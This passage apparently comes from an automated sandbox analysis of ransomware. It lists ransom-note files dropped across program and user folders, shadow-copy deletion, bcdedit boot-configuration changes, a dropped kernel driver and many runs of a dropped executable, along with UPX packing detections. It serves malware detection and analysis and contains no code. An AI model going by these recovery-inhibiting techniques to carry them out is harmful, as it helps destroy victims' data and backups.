C:\Users\Public\Music\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Music\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Users\Admin\Searches\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1340 bcdedit.exe 1076 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS RzKn8STp64.exe -
Executes dropped EXE 359 IoCs
pid Process 1844 NWTyHvYy.exe 928 RzKn8STp.exe 1656 RzKn8STp64.exe 2036 RzKn8STp.exe 1640 RzKn8STp.exe 1088 RzKn8STp.exe 1868 RzKn8STp.exe 1584 RzKn8STp.exe 2012 RzKn8STp.exe 1212 RzKn8STp.exe 472 RzKn8STp.exe 1060 RzKn8STp.exe 1684 RzKn8STp.exe 1188 RzKn8STp.exe 1212 RzKn8STp.exe 1092 RzKn8STp.exe 1328 RzKn8STp.exe 688 RzKn8STp.exe 1996 RzKn8STp.exe 832 RzKn8STp.exe 1488 RzKn8STp.exe 1020 RzKn8STp.exe 1400 RzKn8STp.exe 1188 RzKn8STp.exe 1060 RzKn8STp.exe 1492 RzKn8STp.exe 1136 RzKn8STp.exe 1880 RzKn8STp.exe 1556 RzKn8STp.exe 2040 RzKn8STp.exe 1408 RzKn8STp.exe 972 RzKn8STp.exe 1020 RzKn8STp.exe 564 RzKn8STp.exe 1796 RzKn8STp.exe 1060 RzKn8STp.exe 1584 RzKn8STp.exe 1964 RzKn8STp.exe 1212 RzKn8STp.exe 204 RzKn8STp.exe 224 RzKn8STp.exe 1216 RzKn8STp.exe 1212 RzKn8STp.exe 232 RzKn8STp.exe 1408 RzKn8STp.exe 360 RzKn8STp.exe 1828 RzKn8STp.exe 680 RzKn8STp.exe 832 RzKn8STp.exe 1684 RzKn8STp.exe 220 RzKn8STp.exe 1996 RzKn8STp.exe 228 RzKn8STp.exe 1488 RzKn8STp.exe 1460 RzKn8STp.exe 1960 RzKn8STp.exe 1188 RzKn8STp.exe 1776 RzKn8STp.exe 1168 RzKn8STp.exe 1460 RzKn8STp.exe 1212 RzKn8STp.exe 1188 RzKn8STp.exe 1492 RzKn8STp.exe 1168 RzKn8STp.exe 680 RzKn8STp.exe 1212 RzKn8STp.exe 1340 RzKn8STp.exe 1492 RzKn8STp.exe 1120 RzKn8STp.exe 680 RzKn8STp.exe 2032 RzKn8STp.exe 1340 RzKn8STp.exe 1516 RzKn8STp.exe 1868 RzKn8STp.exe 1112 RzKn8STp.exe 1996 RzKn8STp.exe 220 RzKn8STp.exe 1176 RzKn8STp.exe 1136 RzKn8STp.exe 1936 RzKn8STp.exe 1808 RzKn8STp.exe 1332 RzKn8STp.exe 1680 RzKn8STp.exe 1828 RzKn8STp.exe 472 RzKn8STp.exe 860 RzKn8STp.exe 2032 RzKn8STp.exe 228 RzKn8STp.exe 1176 RzKn8STp.exe 1256 RzKn8STp.exe 1112 RzKn8STp.exe 1408 RzKn8STp.exe 1460 RzKn8STp.exe 1176 RzKn8STp.exe 220 RzKn8STp.exe 1112 RzKn8STp.exe 1136 RzKn8STp.exe 1796 RzKn8STp.exe 1228 RzKn8STp.exe 1488 RzKn8STp.exe 1120 RzKn8STp.exe 884 RzKn8STp.exe 948 RzKn8STp.exe 1232 RzKn8STp.exe 964 RzKn8STp.exe 1120 RzKn8STp.exe 1152 RzKn8STp.exe 1408 RzKn8STp.exe 952 RzKn8STp.exe 232 RzKn8STp.exe 1980 RzKn8STp.exe 1936 RzKn8STp.exe 1832 RzKn8STp.exe 1824 RzKn8STp.exe 920 RzKn8STp.exe 1584 RzKn8STp.exe 1796 RzKn8STp.exe 1832 RzKn8STp.exe 1332 RzKn8STp.exe 660 RzKn8STp.exe 1136 RzKn8STp.exe 1232 RzKn8STp.exe 436 RzKn8STp.exe 2040 RzKn8STp.exe 884 RzKn8STp.exe 1136 RzKn8STp.exe 1076 RzKn8STp.exe 1556 RzKn8STp.exe 1176 RzKn8STp.exe 1408 RzKn8STp.exe 1488 RzKn8STp.exe 964 RzKn8STp.exe 688 RzKn8STp.exe 1176 RzKn8STp.exe 2036 RzKn8STp.exe 1488 RzKn8STp.exe 1828 RzKn8STp.exe 688 RzKn8STp.exe 1200 RzKn8STp.exe 224 RzKn8STp.exe 1232 RzKn8STp.exe 1944 RzKn8STp.exe 972 RzKn8STp.exe 1808 RzKn8STp.exe 1996 RzKn8STp.exe 1784 RzKn8STp.exe 1556 RzKn8STp.exe 972 RzKn8STp.exe 1460 RzKn8STp.exe 1996 RzKn8STp.exe 1340 RzKn8STp.exe 1212 RzKn8STp.exe 1516 RzKn8STp.exe 1488 RzKn8STp.exe 1216 RzKn8STp.exe 528 RzKn8STp.exe 224 RzKn8STp.exe 884 RzKn8STp.exe 1944 RzKn8STp.exe 360 RzKn8STp.exe 1796 RzKn8STp.exe 1152 RzKn8STp.exe 1556 RzKn8STp.exe 1832 RzKn8STp.exe 1136 RzKn8STp.exe 1796 RzKn8STp.exe 1584 RzKn8STp.exe 1212 RzKn8STp.exe 2036 RzKn8STp.exe 1868 RzKn8STp.exe 976 RzKn8STp.exe 1168 RzKn8STp.exe 548 RzKn8STp.exe 1960 RzKn8STp.exe 964 RzKn8STp.exe 908 RzKn8STp.exe 920 RzKn8STp.exe 1808 RzKn8STp.exe 1756 RzKn8STp.exe 1980 RzKn8STp.exe 1152 RzKn8STp.exe 920 RzKn8STp.exe 1832 RzKn8STp.exe 472 RzKn8STp.exe 1796 RzKn8STp.exe 1152 RzKn8STp.exe 1176 RzKn8STp.exe 1832 RzKn8STp.exe 1468 RzKn8STp.exe 1168 RzKn8STp.exe 1472 RzKn8STp.exe 2036 RzKn8STp.exe 1964 RzKn8STp.exe 1188 RzKn8STp.exe 1808 RzKn8STp.exe 1216 RzKn8STp.exe 1232 RzKn8STp.exe 436 RzKn8STp.exe 688 RzKn8STp.exe 1808 RzKn8STp.exe 920 RzKn8STp.exe 1232 RzKn8STp.exe 888 RzKn8STp.exe 688 RzKn8STp.exe 1120 RzKn8STp.exe 920 RzKn8STp.exe 548 RzKn8STp.exe 1680 RzKn8STp.exe 228 RzKn8STp.exe 1332 RzKn8STp.exe 952 RzKn8STp.exe 548 RzKn8STp.exe 1948 RzKn8STp.exe 228 RzKn8STp.exe 232 RzKn8STp.exe 952 RzKn8STp.exe 2032 RzKn8STp.exe 1948 RzKn8STp.exe 472 RzKn8STp.exe 232 RzKn8STp.exe 1112 RzKn8STp.exe 1964 RzKn8STp.exe 908 RzKn8STp.exe 1188 RzKn8STp.exe 660 RzKn8STp.exe 1796 RzKn8STp.exe 1332 RzKn8STp.exe 1996 RzKn8STp.exe 1808 RzKn8STp.exe 964 RzKn8STp.exe 232 RzKn8STp.exe 1216 RzKn8STp.exe 972 RzKn8STp.exe 1488 RzKn8STp.exe 884 RzKn8STp.exe 1200 RzKn8STp.exe 1256 RzKn8STp.exe 1784 RzKn8STp.exe 1468 RzKn8STp.exe 1980 RzKn8STp.exe 1756 RzKn8STp.exe 1944 RzKn8STp.exe 436 RzKn8STp.exe 1828 RzKn8STp.exe 1808 RzKn8STp.exe 368 RzKn8STp.exe 1136 RzKn8STp.exe 436 RzKn8STp.exe 672 RzKn8STp.exe 1808 RzKn8STp.exe 1964 RzKn8STp.exe 1136 RzKn8STp.exe 1560 RzKn8STp.exe 1784 RzKn8STp.exe 1796 RzKn8STp.exe 1964 RzKn8STp.exe 908 RzKn8STp.exe 564 RzKn8STp.exe 1980 RzKn8STp.exe 952 RzKn8STp.exe 860 RzKn8STp.exe 836 RzKn8STp.exe 1492 RzKn8STp.exe 2040 RzKn8STp.exe 1756 RzKn8STp.exe 1340 RzKn8STp.exe 1944 RzKn8STp.exe 836 RzKn8STp.exe 1440 RzKn8STp.exe 1776 RzKn8STp.exe 368 RzKn8STp.exe 1832 RzKn8STp.exe 436 RzKn8STp.exe 1472 RzKn8STp.exe 2032 RzKn8STp.exe 1152 RzKn8STp.exe 1980 RzKn8STp.exe 220 RzKn8STp.exe 860 RzKn8STp.exe 908 RzKn8STp.exe 920 RzKn8STp.exe 660 RzKn8STp.exe 2036 RzKn8STp.exe 1020 RzKn8STp.exe 680 RzKn8STp.exe 1168 RzKn8STp.exe 1440 RzKn8STp.exe 796 RzKn8STp.exe 1864 RzKn8STp.exe 1996 RzKn8STp.exe 436 RzKn8STp.exe 1868 RzKn8STp.exe 1408 RzKn8STp.exe 796 RzKn8STp.exe 1756 RzKn8STp.exe 1996 RzKn8STp.exe 680 RzKn8STp.exe 1868 RzKn8STp.exe 920 RzKn8STp.exe 796 RzKn8STp.exe 1460 RzKn8STp.exe 1996 RzKn8STp.exe 688 RzKn8STp.exe 908 RzKn8STp.exe 1120 RzKn8STp.exe 1212 RzKn8STp.exe 1756 RzKn8STp.exe 1020 RzKn8STp.exe 1832 RzKn8STp.exe 1868 RzKn8STp.exe 836 RzKn8STp.exe 1112 RzKn8STp.exe 1980 RzKn8STp.exe 1340 RzKn8STp.exe 1556 RzKn8STp.exe 2032 RzKn8STp.exe 1472 RzKn8STp.exe 1212 RzKn8STp.exe 1216 RzKn8STp.exe 548 RzKn8STp.exe 964 RzKn8STp.exe 1136 RzKn8STp.exe 1176 RzKn8STp.exe 1112 RzKn8STp.exe 1744 RzKn8STp.exe 1340 RzKn8STp.exe 220 RzKn8STp.exe 2032 RzKn8STp.exe 1188 RzKn8STp.exe 1476 RzKn8STp.exe 884 RzKn8STp.exe 548 RzKn8STp.exe 1020 RzKn8STp.exe 1440 RzKn8STp.exe 1868 RzKn8STp.exe 660 RzKn8STp.exe 368 RzKn8STp.exe 436 RzKn8STp.exe 860 RzKn8STp.exe 360 RzKn8STp.exe 232 RzKn8STp.exe 1212 RzKn8STp.exe 1256 RzKn8STp.exe 1076 RzKn8STp.exe 436 RzKn8STp.exe 2032 RzKn8STp.exe 1232 RzKn8STp.exe 1112 RzKn8STp.exe 1984 RzKn8STp.exe 1432 RzKn8STp.exe 1948 RzKn8STp.exe 1120 RzKn8STp.exe 972 RzKn8STp.exe 1776 RzKn8STp.exe 1980 RzKn8STp.exe 228 RzKn8STp.exe 320 RzKn8STp.exe 2032 RzKn8STp.exe 1440 RzKn8STp.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00030000000131ba-18.dat upx behavioral1/files/0x00030000000131ba-19.dat upx behavioral1/files/0x00030000000131ba-21.dat upx behavioral1/files/0x00030000000131ba-31.dat upx behavioral1/files/0x00030000000131ba-33.dat upx behavioral1/files/0x00030000000131ba-34.dat upx behavioral1/files/0x00030000000131ba-36.dat upx behavioral1/files/0x00030000000131ba-41.dat upx behavioral1/files/0x00030000000131ba-43.dat upx behavioral1/files/0x00030000000131ba-44.dat upx behavioral1/files/0x00030000000131ba-46.dat upx behavioral1/files/0x00030000000131ba-54.dat upx behavioral1/files/0x00030000000131ba-56.dat upx behavioral1/files/0x00030000000131ba-57.dat upx behavioral1/files/0x00030000000131ba-59.dat upx behavioral1/files/0x00030000000131ba-65.dat upx behavioral1/files/0x00030000000131ba-67.dat upx behavioral1/files/0x00030000000131ba-68.dat upx behavioral1/files/0x00030000000131ba-70.dat upx behavioral1/files/0x00030000000131ba-75.dat upx behavioral1/files/0x00030000000131ba-77.dat upx behavioral1/files/0x00030000000131ba-78.dat upx behavioral1/files/0x00030000000131ba-80.dat upx behavioral1/files/0x00030000000131ba-85.dat upx behavioral1/files/0x00030000000131ba-87.dat upx behavioral1/files/0x00030000000131ba-88.dat upx behavioral1/files/0x00030000000131ba-90.dat upx behavioral1/files/0x00030000000131ba-95.dat upx behavioral1/files/0x00030000000131ba-97.dat upx behavioral1/files/0x00030000000131ba-98.dat upx behavioral1/files/0x00030000000131ba-100.dat upx behavioral1/files/0x00030000000131ba-107.dat upx behavioral1/files/0x00030000000131ba-109.dat upx behavioral1/files/0x00030000000131ba-110.dat upx behavioral1/files/0x00030000000131ba-112.dat upx behavioral1/files/0x00030000000131ba-117.dat upx behavioral1/files/0x00030000000131ba-119.dat upx behavioral1/files/0x00030000000131ba-120.dat upx behavioral1/files/0x00030000000131ba-122.dat upx behavioral1/files/0x00030000000131ba-127.dat upx behavioral1/files/0x00030000000131ba-129.dat upx behavioral1/files/0x00030000000131ba-130.dat upx behavioral1/files/0x00030000000131ba-132.dat upx behavioral1/files/0x00030000000131ba-137.dat upx behavioral1/files/0x00030000000131ba-139.dat upx behavioral1/files/0x00030000000131ba-140.dat upx behavioral1/files/0x00030000000131ba-142.dat upx behavioral1/files/0x00030000000131ba-147.dat upx behavioral1/files/0x00030000000131ba-149.dat upx behavioral1/files/0x00030000000131ba-150.dat upx behavioral1/files/0x00030000000131ba-152.dat upx behavioral1/files/0x00030000000131ba-157.dat upx behavioral1/files/0x00030000000131ba-159.dat upx behavioral1/files/0x00030000000131ba-160.dat upx behavioral1/files/0x00030000000131ba-162.dat upx behavioral1/files/0x00030000000131ba-167.dat upx behavioral1/files/0x00030000000131ba-169.dat upx behavioral1/files/0x00030000000131ba-170.dat upx behavioral1/files/0x00030000000131ba-172.dat upx behavioral1/files/0x00030000000131ba-177.dat upx behavioral1/files/0x00030000000131ba-179.dat upx behavioral1/files/0x00030000000131ba-180.dat upx behavioral1/files/0x00030000000131ba-182.dat upx behavioral1/files/0x00030000000131ba-187.dat upx behavioral1/files/0x00030000000131ba-189.dat upx behavioral1/files/0x00030000000131ba-190.dat upx behavioral1/files/0x00030000000131ba-192.dat upx behavioral1/files/0x00030000000131ba-197.dat upx behavioral1/files/0x00030000000131ba-199.dat upx behavioral1/files/0x00030000000131ba-200.dat upx behavioral1/files/0x00030000000131ba-202.dat upx behavioral1/files/0x00030000000131ba-208.dat upx behavioral1/files/0x00030000000131ba-210.dat upx behavioral1/files/0x00030000000131ba-211.dat upx behavioral1/files/0x00030000000131ba-213.dat upx behavioral1/files/0x00030000000131ba-218.dat upx behavioral1/files/0x00030000000131ba-220.dat upx behavioral1/files/0x00030000000131ba-221.dat upx behavioral1/files/0x00030000000131ba-223.dat upx behavioral1/files/0x00030000000131ba-228.dat upx behavioral1/files/0x00030000000131ba-230.dat upx behavioral1/files/0x00030000000131ba-231.dat upx behavioral1/files/0x00030000000131ba-233.dat upx behavioral1/files/0x00030000000131ba-238.dat upx behavioral1/files/0x00030000000131ba-240.dat upx behavioral1/files/0x00030000000131ba-241.dat upx behavioral1/files/0x00030000000131ba-243.dat upx behavioral1/files/0x00030000000131ba-248.dat upx behavioral1/files/0x00030000000131ba-250.dat upx behavioral1/files/0x00030000000131ba-251.dat upx behavioral1/files/0x00030000000131ba-253.dat upx behavioral1/files/0x00030000000131ba-259.dat upx behavioral1/files/0x00030000000131ba-261.dat upx behavioral1/files/0x00030000000131ba-262.dat upx behavioral1/files/0x00030000000131ba-264.dat upx behavioral1/files/0x00030000000131ba-271.dat upx behavioral1/files/0x00030000000131ba-273.dat upx behavioral1/files/0x00030000000131ba-274.dat upx behavioral1/files/0x00030000000131ba-276.dat upx behavioral1/files/0x00030000000131ba-281.dat upx behavioral1/files/0x00030000000131ba-283.dat upx behavioral1/files/0x00030000000131ba-284.dat upx behavioral1/files/0x00030000000131ba-286.dat upx behavioral1/files/0x00030000000131ba-291.dat upx behavioral1/files/0x00030000000131ba-293.dat upx behavioral1/files/0x00030000000131ba-294.dat upx behavioral1/files/0x00030000000131ba-296.dat upx behavioral1/files/0x00030000000131ba-301.dat upx behavioral1/files/0x00030000000131ba-303.dat upx behavioral1/files/0x00030000000131ba-304.dat upx behavioral1/files/0x00030000000131ba-306.dat upx behavioral1/files/0x00030000000131ba-311.dat upx behavioral1/files/0x00030000000131ba-313.dat upx behavioral1/files/0x00030000000131ba-314.dat upx behavioral1/files/0x00030000000131ba-316.dat upx behavioral1/files/0x00030000000131ba-321.dat upx behavioral1/files/0x00030000000131ba-323.dat upx behavioral1/files/0x00030000000131ba-324.dat upx behavioral1/files/0x00030000000131ba-326.dat upx behavioral1/files/0x00030000000131ba-331.dat upx behavioral1/files/0x00030000000131ba-333.dat upx behavioral1/files/0x00030000000131ba-334.dat upx behavioral1/files/0x00030000000131ba-336.dat upx behavioral1/files/0x00030000000131ba-341.dat upx behavioral1/files/0x00030000000131ba-343.dat upx behavioral1/files/0x00030000000131ba-344.dat upx behavioral1/files/0x00030000000131ba-346.dat upx behavioral1/files/0x00030000000131ba-351.dat upx behavioral1/files/0x00030000000131ba-353.dat upx behavioral1/files/0x00030000000131ba-354.dat upx behavioral1/files/0x00030000000131ba-356.dat upx behavioral1/files/0x00030000000131ba-361.dat upx behavioral1/files/0x00030000000131ba-363.dat upx behavioral1/files/0x00030000000131ba-364.dat upx behavioral1/files/0x00030000000131ba-366.dat upx behavioral1/files/0x00030000000131ba-371.dat upx behavioral1/files/0x00030000000131ba-373.dat upx behavioral1/files/0x00030000000131ba-374.dat upx behavioral1/files/0x00030000000131ba-376.dat upx behavioral1/files/0x00030000000131ba-381.dat upx behavioral1/files/0x00030000000131ba-383.dat upx behavioral1/files/0x00030000000131ba-384.dat upx behavioral1/files/0x00030000000131ba-386.dat upx behavioral1/files/0x00030000000131ba-391.dat upx behavioral1/files/0x00030000000131ba-393.dat upx behavioral1/files/0x00030000000131ba-394.dat upx behavioral1/files/0x00030000000131ba-396.dat upx behavioral1/files/0x00030000000131ba-401.dat upx behavioral1/files/0x00030000000131ba-403.dat upx behavioral1/files/0x00030000000131ba-404.dat upx behavioral1/files/0x00030000000131ba-406.dat upx behavioral1/files/0x00030000000131ba-411.dat upx behavioral1/files/0x00030000000131ba-413.dat upx behavioral1/files/0x00030000000131ba-414.dat upx behavioral1/files/0x00030000000131ba-416.dat upx behavioral1/files/0x00030000000131ba-421.dat upx behavioral1/files/0x00030000000131ba-423.dat upx behavioral1/files/0x00030000000131ba-424.dat upx behavioral1/files/0x00030000000131ba-426.dat upx behavioral1/files/0x00030000000131ba-431.dat upx behavioral1/files/0x00030000000131ba-433.dat upx behavioral1/files/0x00030000000131ba-434.dat upx behavioral1/files/0x00030000000131ba-436.dat upx behavioral1/files/0x00030000000131ba-441.dat upx behavioral1/files/0x00030000000131ba-443.dat upx behavioral1/files/0x00030000000131ba-444.dat upx behavioral1/files/0x00030000000131ba-446.dat upx behavioral1/files/0x00030000000131ba-451.dat upx behavioral1/files/0x00030000000131ba-453.dat upx behavioral1/files/0x00030000000131ba-454.dat upx behavioral1/files/0x00030000000131ba-456.dat upx behavioral1/files/0x00030000000131ba-461.dat upx behavioral1/files/0x00030000000131ba-463.dat upx behavioral1/files/0x00030000000131ba-464.dat upx behavioral1/files/0x00030000000131ba-466.dat upx behavioral1/files/0x00030000000131ba-471.dat upx behavioral1/files/0x00030000000131ba-473.dat upx behavioral1/files/0x00030000000131ba-474.dat upx behavioral1/files/0x00030000000131ba-476.dat upx behavioral1/files/0x00030000000131ba-481.dat upx behavioral1/files/0x00030000000131ba-483.dat upx behavioral1/files/0x00030000000131ba-484.dat upx behavioral1/files/0x00030000000131ba-486.dat upx behavioral1/files/0x00030000000131ba-491.dat upx behavioral1/files/0x00030000000131ba-493.dat upx behavioral1/files/0x00030000000131ba-494.dat upx behavioral1/files/0x00030000000131ba-496.dat upx behavioral1/files/0x00030000000131ba-501.dat upx behavioral1/files/0x00030000000131ba-503.dat upx behavioral1/files/0x00030000000131ba-504.dat upx behavioral1/files/0x00030000000131ba-506.dat upx behavioral1/files/0x00030000000131ba-511.dat upx behavioral1/files/0x00030000000131ba-513.dat upx behavioral1/files/0x00030000000131ba-514.dat upx behavioral1/files/0x00030000000131ba-516.dat upx behavioral1/files/0x00030000000131ba-521.dat upx behavioral1/files/0x00030000000131ba-523.dat upx behavioral1/files/0x00030000000131ba-524.dat upx behavioral1/files/0x00030000000131ba-526.dat upx behavioral1/files/0x00030000000131ba-531.dat upx behavioral1/files/0x00030000000131ba-533.dat upx behavioral1/files/0x00030000000131ba-534.dat upx behavioral1/files/0x00030000000131ba-536.dat upx behavioral1/files/0x00030000000131ba-541.dat upx behavioral1/files/0x00030000000131ba-543.dat upx behavioral1/files/0x00030000000131ba-544.dat upx behavioral1/files/0x00030000000131ba-546.dat upx behavioral1/files/0x00030000000131ba-551.dat upx behavioral1/files/0x00030000000131ba-553.dat upx behavioral1/files/0x00030000000131ba-554.dat upx behavioral1/files/0x00030000000131ba-556.dat upx behavioral1/files/0x00030000000131ba-561.dat upx behavioral1/files/0x00030000000131ba-563.dat upx behavioral1/files/0x00030000000131ba-564.dat upx behavioral1/files/0x00030000000131ba-566.dat upx behavioral1/files/0x00030000000131ba-571.dat upx behavioral1/files/0x00030000000131ba-573.dat upx behavioral1/files/0x00030000000131ba-574.dat upx behavioral1/files/0x00030000000131ba-576.dat upx behavioral1/files/0x00030000000131ba-581.dat upx behavioral1/files/0x00030000000131ba-583.dat upx behavioral1/files/0x00030000000131ba-584.dat upx behavioral1/files/0x00030000000131ba-586.dat upx behavioral1/files/0x00030000000131ba-591.dat upx behavioral1/files/0x00030000000131ba-593.dat upx behavioral1/files/0x00030000000131ba-594.dat upx behavioral1/files/0x00030000000131ba-596.dat upx behavioral1/files/0x00030000000131ba-601.dat upx behavioral1/files/0x00030000000131ba-603.dat upx behavioral1/files/0x00030000000131ba-604.dat upx behavioral1/files/0x00030000000131ba-606.dat upx behavioral1/files/0x00030000000131ba-611.dat upx behavioral1/files/0x00030000000131ba-613.dat upx behavioral1/files/0x00030000000131ba-614.dat upx behavioral1/files/0x00030000000131ba-616.dat upx behavioral1/files/0x00030000000131ba-621.dat upx behavioral1/files/0x00030000000131ba-623.dat upx behavioral1/files/0x00030000000131ba-624.dat upx behavioral1/files/0x00030000000131ba-626.dat upx behavioral1/files/0x00030000000131ba-631.dat upx behavioral1/files/0x00030000000131ba-633.dat upx behavioral1/files/0x00030000000131ba-634.dat upx behavioral1/files/0x00030000000131ba-636.dat upx behavioral1/files/0x00030000000131ba-641.dat upx behavioral1/files/0x00030000000131ba-643.dat upx behavioral1/files/0x00030000000131ba-644.dat upx behavioral1/files/0x00030000000131ba-646.dat upx behavioral1/files/0x00030000000131ba-651.dat upx behavioral1/files/0x00030000000131ba-653.dat upx behavioral1/files/0x00030000000131ba-654.dat upx behavioral1/files/0x00030000000131ba-656.dat upx behavioral1/files/0x00030000000131ba-661.dat upx behavioral1/files/0x00030000000131ba-663.dat upx behavioral1/files/0x00030000000131ba-664.dat upx behavioral1/files/0x00030000000131ba-666.dat upx behavioral1/files/0x00030000000131ba-671.dat upx behavioral1/files/0x00030000000131ba-673.dat upx behavioral1/files/0x00030000000131ba-674.dat upx behavioral1/files/0x00030000000131ba-676.dat upx behavioral1/files/0x00030000000131ba-681.dat upx behavioral1/files/0x00030000000131ba-683.dat upx behavioral1/files/0x00030000000131ba-684.dat upx behavioral1/files/0x00030000000131ba-686.dat upx behavioral1/files/0x00030000000131ba-691.dat upx behavioral1/files/0x00030000000131ba-693.dat upx behavioral1/files/0x00030000000131ba-694.dat upx behavioral1/files/0x00030000000131ba-696.dat upx behavioral1/files/0x00030000000131ba-701.dat upx behavioral1/files/0x00030000000131ba-703.dat upx behavioral1/files/0x00030000000131ba-704.dat upx behavioral1/files/0x00030000000131ba-706.dat upx behavioral1/files/0x00030000000131ba-711.dat upx behavioral1/files/0x00030000000131ba-713.dat upx behavioral1/files/0x00030000000131ba-714.dat upx behavioral1/files/0x00030000000131ba-716.dat upx behavioral1/files/0x00030000000131ba-721.dat upx behavioral1/files/0x00030000000131ba-723.dat upx behavioral1/files/0x00030000000131ba-724.dat upx behavioral1/files/0x00030000000131ba-726.dat upx behavioral1/files/0x00030000000131ba-731.dat upx behavioral1/files/0x00030000000131ba-733.dat upx behavioral1/files/0x00030000000131ba-734.dat upx behavioral1/files/0x00030000000131ba-736.dat upx behavioral1/files/0x00030000000131ba-741.dat upx behavioral1/files/0x00030000000131ba-743.dat upx behavioral1/files/0x00030000000131ba-744.dat upx behavioral1/files/0x00030000000131ba-746.dat upx behavioral1/files/0x00030000000131ba-751.dat upx behavioral1/files/0x00030000000131ba-753.dat upx behavioral1/files/0x00030000000131ba-754.dat upx behavioral1/files/0x00030000000131ba-756.dat upx behavioral1/files/0x00030000000131ba-761.dat upx behavioral1/files/0x00030000000131ba-763.dat upx behavioral1/files/0x00030000000131ba-764.dat upx behavioral1/files/0x00030000000131ba-766.dat upx behavioral1/files/0x00030000000131ba-771.dat upx behavioral1/files/0x00030000000131ba-773.dat upx behavioral1/files/0x00030000000131ba-774.dat upx behavioral1/files/0x00030000000131ba-776.dat upx behavioral1/files/0x00030000000131ba-781.dat upx behavioral1/files/0x00030000000131ba-783.dat upx behavioral1/files/0x00030000000131ba-784.dat upx behavioral1/files/0x00030000000131ba-786.dat upx behavioral1/files/0x00030000000131ba-791.dat upx behavioral1/files/0x00030000000131ba-793.dat upx behavioral1/files/0x00030000000131ba-794.dat upx behavioral1/files/0x00030000000131ba-796.dat upx behavioral1/files/0x00030000000131ba-801.dat upx behavioral1/files/0x00030000000131ba-803.dat upx behavioral1/files/0x00030000000131ba-804.dat upx behavioral1/files/0x00030000000131ba-806.dat upx behavioral1/files/0x00030000000131ba-811.dat upx behavioral1/files/0x00030000000131ba-813.dat upx 